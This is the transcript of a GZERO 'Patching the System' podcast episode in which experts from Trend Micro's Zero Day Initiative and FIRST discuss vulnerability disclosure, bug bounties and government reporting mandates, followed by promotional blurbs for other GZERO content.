Podcast: Can governments protect us from dangerous software bugs?

Global Stage Podcast | Patching the System | Can governments protect us from dangerous software bugs?

Transcript

Listen: We've probably all felt the slight annoyance at prompts we receive to update our devices. But these updates deliver vital patches to our software, protecting us from bad actors. Governments around the world are increasingly interested in monitoring when dangerous bugs are discovered as a means to protect citizens. But would such regulation have the intended effect?

In season 2, episode 5 of Patching the System, we focus on the international system of bringing peace and security online. In this episode, we look at how software vulnerabilities are discovered and reported, what government regulators can and can't do, and the strength of a coordinated disclosure process, among other solutions.

Our participants are:

  • Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro
  • Serge Droz from the Forum of Incident Response and Security Teams (FIRST)
  • Ali Wyne, Eurasia Group Senior Analyst (moderator)

    GZERO’s special podcast series “Patching the System,” produced in partnership with Microsoft as part of the award-winning Global Stage series, highlights the work of the Cybersecurity Tech Accord, a public commitment from over 150 global technology companies dedicated to creating a safer cyber world for all of us.

    Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.

    TRANSCRIPT: Can governments protect us from dangerous software bugs?

    Disclosure: The opinions expressed by Eurasia Group analysts in this podcast episode are their own, and may differ from those of Microsoft and its affiliates.

    DUSTIN CHILDS: The industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.

    SERGE DROZ: I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable.

    ALI WYNE: If you've ever gotten a notification pop up on your phone or computer saying that an update is urgently needed, you've probably felt that twinge of inconvenience at having to wait for a download or restart your device. But what you might not always think about is that these software updates can also deliver patches to your system, a process that is in fact where this podcast series gets its name.

    Today, we'll talk about vulnerabilities that we all face in a world of increasing interconnectedness.

    Welcome to Patching the System, a special podcast from the Global Stage Series, a partnership between GZERO Media and Microsoft. I'm Ali Wyne, a senior analyst at Eurasia Group. Throughout this series, we're highlighting the work of the Cybersecurity Tech Accord, a public commitment from more than 150 global technology companies dedicated to creating a safer cyber world for all of us.

    And about those vulnerabilities that I mentioned before, we're talking specifically about the vulnerabilities in the wide range of IT products that we use, which can be entry points for malicious actors. And governments around the world are increasingly interested in knowing about these software vulnerabilities when they're discovered.

    Since 2021 for example, China has required that anytime such software vulnerabilities are discovered, they first be reported to a government ministry even before the company that makes a technology is alerted to the issue. In the European Union, less stringent, but similar legislation is pending, that would require companies that discover that a software vulnerability has been exploited to report the information to government agencies within 24 hours and also provide information on any mitigation use to correct the issue.

    These policy trends have raised concerns from technology companies and incident responders that such policies could actually undermine security.

    Joining us today to delve into these trends and explain why are Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm base in Japan, and Serge Droz from the Forum of Incident Response and Security Teams, AKA First, a community of IT security teams that respond when there's a major cyber crisis. Dustin, Serge, welcome to you both.

    DUSTIN CHILDS: Hello. Thanks for having me.

    SERGE DROZ: Hi. Thanks for having me.

    ALI WYNE: It's great to be talking with both of you today. Dustin, let me kick off the conversation with you. And I tried in my introductory remarks to give listeners a quick glimpse as to what it is that we're talking about here, but give us some more detail. What exactly do we mean by vulnerabilities in this context and where did they originate?

    DUSTIN CHILDS: Well, vulnerability, really when you break it down, it's a flaw in software that could allow a threat actor to potentially compromise a target, and that's a fancy way of saying it's a bug. They originate in humans because humans are imperfect and they make imperfect code, so there's no software in the world that is completely bug free, at least none that we've been able to generate so far. So every product, every program given enough time and resources can be compromised because they all have bugs, they all have vulnerabilities in them. Now, vulnerability doesn't necessarily mean that it can be exploited, but a vulnerability is something within a piece of software that potentially can be exploited by a threat actor, a bad guy.

    ALI WYNE: And Serge, when we're talking about the stakes here, obviously vulnerabilities can create cracks in the foundation that lead to cybersecurity incidents or attacks. What does it take for a software vulnerability to become weaponized?

    SERGE DROZ: Well, that really depends on the particular vulnerability. A couple of years ago, there was a vulnerability that was really super easy to exploit: log4j. It was something that everybody could do in an afternoon, and that of course, is a really big risk. If something like that gets public before it's fixed, we really have a big problem. Other vulnerabilities are much harder to exploit also because software vendors, in particular operating system vendors have invested a great deal in making it hard to exploit vulnerabilities on their systems. The easy ones are getting rarer, mostly because operating system companies are building countermeasures that makes it hard to exploit these. Others are a lot harder and need specialists, and that's why they fetch such a high price. So there is no general answer, but the trend is it's getting harder, which is a good thing.

    ALI WYNE: And Dustin, let me come back to you then. So who might discover these vulnerabilities first and what kinds of phenomena make them more likely to become a major security risk? And give us a sense of the timeline between when a vulnerability is discovered and when a so-called bad actor can actually start exploiting it in a serious way.

    DUSTIN CHILDS: The people who are discovering these are across the board. They're everyone from lone researchers just looking at things to nation states, really reverse engineering programs for their own purposes. So a lot of different people are looking at bugs, and it could be you just stumble across it too and it's like, "Oh, hey. Look, it's a bug. I should report this."

    So there's a lot of different people who are finding bugs. Not all of them are monetizing their research. Some people just report it. Some people will find a bug and want to get paid in one way or another, and that's what I do, is I help them with that.

    But then once it gets reported, depending on what industry you're in, it's usually like 120 days to up to a year until it gets fixed from the vendor. But if a threat actor finds it, they can weaponize it and it can be weaponized, they can do that within 48 hours. So even if a patch is available and that patch is well-known, the bad guys can take that patch and reverse engineer it and turn it into an exploit within 48 hours and start spreading. So within 30 days of a patch being made available, widespread exploitation is not uncommon if a bug can be exploited.

    ALI WYNE: Wow. So 48 hours, that doesn't give folks much time to respond, but thank you, Dustin, for giving us that number. I think we now have at least some sense of the problem, the scale of the problem, and we'll talk about prevention and solutions in a bit. But first, Serge, I want to come back to you. I want to go into some more detail about the reporting process. What are the best practices in terms of reporting these vulnerabilities that we've been discussing today? I mean, suppose if I were to discover a software vulnerability for example, what should I do?

    SERGE DROZ: This is a really good question, and there's still a lot of ongoing debate, even though the principles are actually quite clear. If you find a vulnerability, your first step should be to actually start informing confidentially the vendor, whoever is responsible for the software product.

    But that actually sounds easier than it is because quite often it's maybe hard to talk to a vendor. There's still some companies out there that don't talk to ‘hackers,’ in inverted commas. That's really bad practice. In this case, I recommend that you contact a national agency that you trust that can mediate in between you, and that's all fairly easy to do if it's just between you and another party, but then you have a lot of vulnerabilities in products for no one is really responsible, take open source or products that actually are used in all the other products.

    So we talking about supply chain issues and then things really become messy. And in these cases, I really recommend that people start working together with someone who's experienced in doing coordinated vulnerability disclosure. Quite often what happens is that within the industry affected organizations get together, they form a working group that silently starts mitigating this spec practices, that you give the vendor three months or more to actually be able to fix a bug because sometimes it's not that easy. What you really should not be doing is leaking any kind of information, like even saying, "Hey, I have found the vulnerability in product X," it may actually trigger someone to start looking at this. So this is really important that this remains a confidential process where very few people are involved.

    ALI WYNE: So one popular method of uncovering these vulnerabilities that we've been discussing, it involves, so-called bug bounty programs. What are bug bounty programs? Are they a good tool for catching and reporting these vulnerabilities, and then moving beyond bug bounty programs, are there other tools that work when it comes to reporting vulnerabilities?

    SERGE DROZ: Bug bounty programs are just one of the tools we have in our tool chest to actually find vulnerabilities. The idea behind a bounty program is that you have a lot of researchers that actually poke at code just because they may be interested, and at the company or a producer of software, you offer them a bounty, some money. If they report a vulnerability responsibly, you pay them some money usually depending on how severe or how dangerous the vulnerability is and encourage good behavior this way. I think it's a really great way because it actually creates a lot of diversity. Typically, bug bounty programs attract a lot of different types of researchers. So we have different ways of looking at your code and that often discovers vulnerabilities that no one has ever thought of because no one really had that way of thought, so I think it's a really good thing.

    It also awards people that responsibly disclose and don't just sell it to the highest bidder because we do have companies out there that buy vulnerabilities that then end up in some strange gray market, exactly what we don't want, so I think that's a really good thing. Bug bounty programs are complimentary to what we call penetration testing, where you hire a company that for money, starts looking at your software. There's no guarantee that they find a bug, but they usually have a systematic way of going over this and you have an agreement. As I said, I don't think there's a single silver bullet, a single way to make this, but I think this is a great way to actually also reward this. And some of the bug bounty researchers make a lot of money. They actually make a living of that. If you're really good, you can make a decent amount of money.

    DUSTIN CHILDS: Yeah, and let me just add on to that as someone who runs a bug bounty program. There are a couple of different types of bug bounty programs too, and the most common one is the vendor specific one. So Microsoft buys Microsoft bugs, Apple buys Apple bugs, Google buys Google bugs. Then there's the ones that are like us. We're vendor-agnostic. We buy Microsoft and Apple and Google and Dell and everything else pretty much in between.

    And one of the biggest things that we do as a vendor-agnostic program is an individual researcher might not have a lot of sway when they contact a big vendor like a Microsoft or a Google, but if they come through a program like ours or other vendor-agnostic programs out there, they know that they have the weight of the Zero Day Initiative or that program behind it, so when the vendor receives that report, they know it's already been vetted by a program and it's already been looked at. So it's a little bit like giving them a big brother that they can take to the schoolyard and say, "Show me where the software hurt you," and then we can help step in for that.

    ALI WYNE: And Dustin, you've told us what bug bounty programs are. Why would someone want to participate in that program?

    DUSTIN CHILDS: Well, researchers have a lot of different motivations, whether it's curiosity or just trying to get stuff fixed, but it turns out money is a very big motivator pretty much across the spectrum. We all have bills to pay, and a bug bounty program is a way to get something fixed and earn potentially a large amount of money depending on the type of bug that you have. The bugs I deal with range anywhere between $150 on the very low end, up to $15 million for the most severe zero click iPhone exploits being purchased by government type of thing, so there's all points in between too. So it's potentially lucrative if you find the right types of bugs, and we do have people who are exclusively bug hunters throughout the year and they make a pretty good living at it.

    ALI WYNE: Duly noted. So maybe I'm playing a little bit of a devil's advocate here, but if vulnerabilities, these cyber vulnerabilities, if they usually arise from errors in code or other technology mistakes from companies, aren't they principally a matter of industry responsibility? And wouldn't the best prevention just be to regulate software development more tightly and avoid these mistakes from getting out into the world in the first place?

    DUSTIN CHILDS: Oh, you used the R word. Regulation, that's a big word in this industry. So obviously it's less expensive to fix bugs in software before it ships than after it ships. So yes, obviously it's better to fix these bugs before they reach the public. However, that's not really realistic because like I said, every software has bugs and you could spend a lifetime testing and testing and testing and never root them all out and then never ship a product. So the industry right now is definitely looking to ship product. Can they do a better job? I certainly think they can. I spent a lot of money buying bugs and some of them I'm like, "Ooh, that's a silly bug that should never have left wherever shipped at." So absolutely, the industry needs to do better than what they have been doing in the past, but it's never going to be a situation where they ship perfect code, at least not with our current way of developing software.

    ALI WYNE: Obviously there isn't any silver bullet when it comes to managing these vulnerabilities, disclosing these vulnerabilities. So assuming that we probably can't eliminate all of them, how should organizations deal with fixing these issues when they're discovered? And is there some kind of coordinated vulnerability disclosure process that organizations should follow?

    DUSTIN CHILDS: There is a coordinated disclosure process. I mean, I've been in this industry for 25 years and dealing with vulnerability disclosures since 2008 personally, so this is a well-known process where you report to it. As an industry if you're developing software, one of the most important things you can do is make sure you have a contact. If someone finds a bug in your program, who do they email? The more established programs like Microsoft and Apple and Google, it's very clear if you find a bug there who you're supposed to email and what you're supposed to do with it. One of the problems we have as a bug bounty program is if we purchase a bug in a lesser known piece of software, sometimes it's hard for us to hunt down who actually is responsible for maintaining it and updating it.

    We've even had to go on to Twitter and LinkedIn to try and hunt down some people to respond to an email to say, "Hey, we've got a bug in your program," so that's one of the biggest things you can do is just be aware that somebody could report a bug to you. And as a consumer of the product, however, you need a patch management program. So you can't just rely on automatic updates. You can't just rely on things happening automatically or easily. You need to understand first what is in your environment, so you have to be ruthless in your asset discovery, and I do use the word ruthless there intentionally. You've got to know what is in your enterprise to be able to defend it, and then you've got to have a plan for managing it and patching it. That's a lot easier said than done, especially in a modern enterprise where not only do you have desktops and laptops, you've got IT devices, you've got IOT devices, you've got thermostats, you've got update, you've got little screens everywhere that need updating and they all have to be included in that patch management process.

    ALI WYNE: Serge, when it comes to triaging vulnerabilities, it doesn't sound like there's a large need for government participation. So what are some of the reasons legitimate and maybe less than legitimate why governments might increasingly want to be notified about vulnerabilities even before patches are available? What are their motivations?

    SERGE DROZ: So I think there are several different motivations that governments are getting increasingly fed up with these kind of excuses that our industry, the software industry makes about how hard it is to avoid software vulnerabilities, all the reasons and excuses we bring and for not doing our jobs. And frankly, as Dustin said, we could be doing better. Governments just want to know so they can actually give out the message that, "Hey, we're watching you and we want to make sure you do your job." Personally, I'm not really convinced this is going to work. So that will be mostly the legitimate reasons why the governments want to know about vulnerabilities. I think it's fair that the government knows or learns about the vulnerability after the fact, just to get an idea of what the risk is for the entire industry. Personally, I feel it should only be the parties that need to know should know it during the responsible disclosure.

    And then of course, there's governments that like vulnerabilities because they can abuse it themselves. I mean, governments are known to exploit vulnerabilities through their favorite three letter agencies. That's actually quite legitimate for governments to do. It's not illegal for governments to do this type of work, but of course, as a consumer or as an end user, I don't like this, I don't want products that have vulnerabilities that are exploited. And personally from a civil society point of view, there's just too much risk with this being out there. So my advice really is the fewer people, the few organizations know about a vulnerability the better.

    DUSTIN CHILDS: What we've been talking about a lot so far is what we call coordinated disclosure, where the researcher and the vendor coordinate a response. When you start talking about governments though, you start talking about non-disclosure, and that's when people hold onto these bugs and don't report them to the vendor at all, and the reason they do that is so that they can use them exclusively. So that is one reason why governments hold onto these bugs and want to be notified is so that they have a chance to use them against their adversaries or against their own population before anyone else can use them or even before it gets fixed.

    ALI WYNE: So the Cybersecurity Tech Accord had recently released a statement opposing the kinds of reporting requirements we've been discussing. From an industry perspective, what are the concerns when it comes to reporting on vulnerabilities to governments?

    DUSTIN CHILDS: Really the biggest concern is making sure that we all have an equitable chance to get it fixed before it gets used. If a single government starts using vulnerabilities to exploit for their own personal gain, for whatever, that puts the rest of the world at a disadvantage, and that's the rest of the world, their allies as well as their opponents. So we want to do coordinated disclosure. We want to get the bugs fixed in a timely manner, and keeping them to themselves really discourages that. It discourages finding bugs, it discourages reporting bugs. It really discourages from vendors from fixing bugs too, because if the vendors know that the governments are just going to be using these bugs, they might get a phone call from their friendly neighborhood three letter and say, "You know what? Hold off on fixing that for a while." Again, it just puts us all at risk, and we saw this with Stuxnet.

    Stuxnet was a tool that was developed by governments targeting another government. It was targeting Iranian nuclear facilities, and it did do damage to Iranian nuclear facilities, but it also did a lot of collateral damage throughout Europe as well, and that's what we're trying to avoid. It's like if it's a government on government thing, great, that's what governments do, but we're trying to minimize the collateral damage from everyone else who was hurt by this, and there really were a lot of other places that were impacted negatively from the Stuxnet virus.

    ALI WYNE: And Serge, what would you say to someone who might respond to the concerns that Dustin has raised by saying, "Well, my government is advanced and capable enough to handle information about vulnerabilities responsibly and securely, so there's no issue or added risk in reporting to them." What would you say to that individual?

    SERGE DROZ: The point is that there are certain things that really you only deal on a need to know basis. That's something that governments actually do know. Governments when they deal with confidential or critical information, it's always on the need to know. They don't tell this to every government employee even though they're, of course, are loyal. It makes the risk of this leaking even if the government doesn't have any ill intent bigger, so there's just no need the same way there is no need that all the other a hundred thousand security researchers need to know about this. So I think as long as you cannot contribute constructively to mitigating this vulnerability, you should not be part of that process.

    Having said that, though, there is some governments that actually have really tried hard to help researchers making contact with vendors. Some researchers are afraid to report vulnerabilities because they feel they're going to become under pressure or stuff like this. So if a government wants to take that role and can or can't create enough trust that researchers trust them, I don't really have a problem, but it should not be mandatory. Trust needs to be earned. You cannot legislate this, and every time you have to legislate something, I mean, come on, you legislate it because people don't trust you.

    ALI WYNE: We spent some time talking about vulnerabilities, why they're a problem. We've discussed some effective and maybe some not so effective ways to prevent or manage them better. And I think the governments have a legitimate interest in knowing the companies are acting responsibly and that, that interest is the impetus behind some of the push, at least for more regulation and reporting. But what do each of you see sees other ways that governments could help ensure that companies are mitigating risks and protecting consumers as much as possible?

    DUSTIN CHILDS: So one of the things that we're involved with here at the Zero Day Initiative is encouraging governments to allow safe harbor. And really what that means is researchers are safe in reporting vulnerabilities to a vendor without the legal threat of being sued or having other action taken against them so that as long as they are legitimately reporting a bug and not trying to steal or violate laws, as long as they're legitimate researchers trying to get something fixed, they're able to do that without facing legal consequences.

    One of the biggest things that we do as a bug bounty program is just handle the communications between researchers and the vendors, and that is really where it can get very contentious. So to me, one of the things that governments can do to help is make sure that safe harbor is allowed so that the researchers know that, "I can report this vulnerability to this vendor without getting in touch with a lawyer first. I'm just here trying to get something fixed. Maybe I'm trying to get paid as well," so maybe there is some monetary value in it, but really they're just trying to get something fixed, and they're not trying to extort anyone. They're not trying to create havoc, they're just trying to get a bug fixed, and that safe harbor would be very valuable for them. That's one thing we're working on with our government contacts, and I think it's a very big thing for the industry to assume as well.

    SERGE DROZ: Yes, I concur with Dustin. I think the job of the government is to create an environment in which responsible vulnerability disclosure is actually possible and is also something that's desirable, that also includes a regulatory framework that actually gets away from this blaming. I mean, writing software is hard, bugs appear. If you just constantly keep bashing people that they're not doing it right or you threaten them with liabilities, they're not going to talk to you about these types of things. So I think the job of the government is to encourage responsible behavior and to create an environment in that, and maybe there's always going to be a couple of black sheeps, and here maybe the role of the government is really to encourage them to play along and start offering vulnerability reporting programs. That's where I see the role of the government, creating good governance to actually enable responsible vulnerabilities disclosure.

    ALI WYNE: Dustin Childs, Head of Threat Awareness at the Zero Day Initiative at Trend Micro, a cybersecurity firm base in Japan. And Serge Droz from the Forum of Incident Response and Security Teams, a community of IT security teams that respond when there is a major cyber crisis. Dustin, Serge, thanks very much for joining me today.

    DUSTIN CHILDS: You're very welcome. Thank you for having me.

    SERGE DROZ: Yes, same here. It was a pleasure.

    ALI WYNE: That's it for this episode of Patching the System. We have five episodes this season covering everything from cyber mercenaries to a cybercrime treaty. So follow Ian Bremmer's GZERO World feed anywhere you get your podcast to hear more. I'm Ali Wyne. Thanks very much for listening.

      Subscribe to the GZERO World Podcast on Apple Podcasts, Spotify, Stitcher, or your preferred podcast platform, to receive new episodes as soon as they're published.

      More from GZERO Media

      - YouTube

      What will President-Elect Donald Trump’s election win mean for the US economy? After years of inflation and stagnating wage growth, millions of voters elected Trump off the back of his promise to usher in a “golden age of America.” Trump has vowed to raise tariffs, slash business regulation, and deport millions of undocumented immigrants, policies he says will put Americans first. But what will that mean practically for workers and consumers? On GZERO World, Ian Bremmer is joined by Oren Cass, the founder and chief economist of the conservative think tank American Compass, who thinks Trump’s tariff plan will be a step in the right direction.

      This week, in GZERO Daily, we will be rolling out our top political game changers of the year. Stay tuned, and check back here on Friday for our Top 10.

      Syrian refugees in Ankara, Turkey, celebrate the fall of Syrian President Bashar al-Assad on Dec. 8, 2024.

      Diego Cupolo/NurPhoto via Reuters

      The toppling of Bashar Assad’s regime in Syria could significantly impact the future of Syrian refugees, in both neighboring states and beyond.

      French President Emmanuel Macron shakes hands with US President-elect Donald Trump as he arrives for a meeting at the Elysee Palace in Paris as part of ceremonies to mark the reopening of the Notre-Dame de Paris Cathedral, in Paris, on Dec. 7, 2024.
      REUTERS/Sarah Meyssonnier

      Forget the Eras Tour: From Paris to New York City, US President-elect Donald Trump had a whirlwind weekend.

      South Koreans hold a mass rally demanding the impeachment and imprisonment of President Yoon Suk-Yeol near the National Assembly in Seoul, South Korea, on Dec. 7.
      Lee Jae-Won/AFLO via Reuters

      President Yoon Suk Yeol survived this weekend's impeachment vote because fellow conservatives, in a show of unity, walked out of the National Assembly on Saturday. But his People Power Party is pushing for Yoon's resignation and an end to the chaos. We delve into what the coming weeks will mean for Yoon, South Korea, and the region.

      As you start checking off everyone on your holiday shopping list, it’s important to remember that more online shopping means more opportunities for cyber scams. But don’t let the Grinch steal your holiday cheer! It’s time to make a list of essential cybersecurity tips — and check it twice — to ensure a safe and merry shopping experience. Unwrap some festive tips to keep your holiday season jolly and scam-free.

      Listen: Donald Trump has promised to fix what he calls a broken economy and usher in a “golden age of America.” He’s vowed to implement record tariffs, slash regulation, and deport millions of undocumented immigrants. But what will that mean practically for America’s economic future? On the GZERO World Podcast, Ian Bremmer is joined by Oren Cass, founder and chief economist at the conservative think tank American Compass, to discuss Trump’s economic agenda and why Cass believes it will help American workers and businesses in the long run.